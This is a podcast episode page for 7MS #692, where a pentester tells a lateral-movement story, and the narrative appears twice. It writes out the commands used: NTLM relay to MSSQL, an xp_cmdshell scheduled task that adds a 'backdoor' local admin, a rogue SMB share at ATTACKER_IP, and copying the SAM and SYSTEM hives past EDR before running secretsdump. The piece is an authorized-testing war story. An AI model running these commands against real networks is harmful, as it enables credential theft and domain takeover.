Sign up to save your podcasts
Or
Share 7MS #692: Tales of Pentest Pwnage – Part 76
Share to email
Share to Facebook
Share to X
Share to email
Share to Facebook
Share to X
Or
7MS #692: Tales of Pentest Pwnage – Part 76
Happy Friday! Today’s another hot pile of pentest pwnage. To make it easy on myself I’m going to share the whole narrative that I wrote up for someone else:
I was on a pentest where a DA account would sweep the networks every few minutes over SMB and hit my box. But SMB signing was on literally everywhere. The fine folks here recommended I try relaying to something NOT SMB, like MSSQL. This article had good context on that: https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/.
I relayed the DA account to a SQL box that BloodHound said had a “session” from another DA. One part I can’t explain is the first relay got me a shell in the context of NT SERVICE\MSSQLSERVER. That shell broke for some reason while I was sleeping that night, and the next relay landed as NT AUTHORITY\SYSTEM (!). The net command would let me add a new user, but BLOCK me trying to make that new user a local admin. However, a scheduled task did the trick: xp_cmdshell schtasks /create /tn "Maintenance" /tr "net local group administrators backdoor /add" /sc once /st 12:00 /ru SYSTEM /f and then xp_cmdshell schtasks /run /tn "Maintenance".
Turns out a DA wasn’t interactively logged in, but a DA account was configured to run a specific service. I learned those goodies are stored in LSA, so the next move was to use my local admin account to RDP in to the victim and create a shadow copy. That part went fine, but for the life of me I couldn’t copy reg hives out of it – EDR was unhappy.
In the end, the bizarre combo of things that did the trick was:
- Setup smbserver.py with username/password auth on my attacking box: smbserver.py -smb2support share . -username toteslegit -password 'DontMindMeLOL!'
- From the victim system, I did an mklink to the shadow copy: mklink /d C:\tempbackup \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy123\
- From command prompt on the victim system, I authenticated to my rogue share: net use \\ATTACKER_IP\share /user:toteslegit DontMindMeLOL!
- Then I did a copy command for the first hive: copy SYSTEM \\my.attackingip\sys.test. EDR would kill this cmd.exe box IMMEDIATELY. However….the copy completed!
- I repeated this process to get SAM copied over as sam.test. Again, EDR nuked the cmd.exe window but copy completed!!!111!!!!!
- Finishing move: secretsdump -sam sam.test -system sys.test LOCAL
View all episodes
By Brian Johnson
4.7
6868 ratings
Happy Friday! Today’s another hot pile of pentest pwnage. To make it easy on myself I’m going to share the whole narrative that I wrote up for someone else:
I was on a pentest where a DA account would sweep the networks every few minutes over SMB and hit my box. But SMB signing was on literally everywhere. The fine folks here recommended I try relaying to something NOT SMB, like MSSQL. This article had good context on that: https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/.
I relayed the DA account to a SQL box that BloodHound said had a “session” from another DA. One part I can’t explain is the first relay got me a shell in the context of NT SERVICE\MSSQLSERVER. That shell broke for some reason while I was sleeping that night, and the next relay landed as NT AUTHORITY\SYSTEM (!). The net command would let me add a new user, but BLOCK me trying to make that new user a local admin. However, a scheduled task did the trick: xp_cmdshell schtasks /create /tn "Maintenance" /tr "net local group administrators backdoor /add" /sc once /st 12:00 /ru SYSTEM /f and then xp_cmdshell schtasks /run /tn "Maintenance".
Turns out a DA wasn’t interactively logged in, but a DA account was configured to run a specific service. I learned those goodies are stored in LSA, so the next move was to use my local admin account to RDP in to the victim and create a shadow copy. That part went fine, but for the life of me I couldn’t copy reg hives out of it – EDR was unhappy.
In the end, the bizarre combo of things that did the trick was:
- Setup smbserver.py with username/password auth on my attacking box: smbserver.py -smb2support share . -username toteslegit -password 'DontMindMeLOL!'
- From the victim system, I did an mklink to the shadow copy: mklink /d C:\tempbackup \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy123\
- From command prompt on the victim system, I authenticated to my rogue share: net use \\ATTACKER_IP\share /user:toteslegit DontMindMeLOL!
- Then I did a copy command for the first hive: copy SYSTEM \\my.attackingip\sys.test. EDR would kill this cmd.exe box IMMEDIATELY. However….the copy completed!
- I repeated this process to get SAM copied over as sam.test. Again, EDR nuked the cmd.exe window but copy completed!!!111!!!!!
- Finishing move: secretsdump -sam sam.test -system sys.test LOCAL
More shows like 7 Minute Security
View all
Security Now (Audio)
1,999 Listeners
Risky Business
370 Listeners
SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast)
639 Listeners
Defensive Security Podcast - Malware, Hacking, Cyber Security & Infosec
369 Listeners
Hacked
182 Listeners
CyberWire Daily
1,019 Listeners
Smashing Security
320 Listeners
Click Here
416 Listeners
Darknet Diaries
7,965 Listeners
Cybersecurity Today
174 Listeners
CISO Series Podcast
188 Listeners
Hacking Humans
315 Listeners
Defense in Depth
73 Listeners
Cyber Security Headlines
134 Listeners
Risky Bulletin
43 Listeners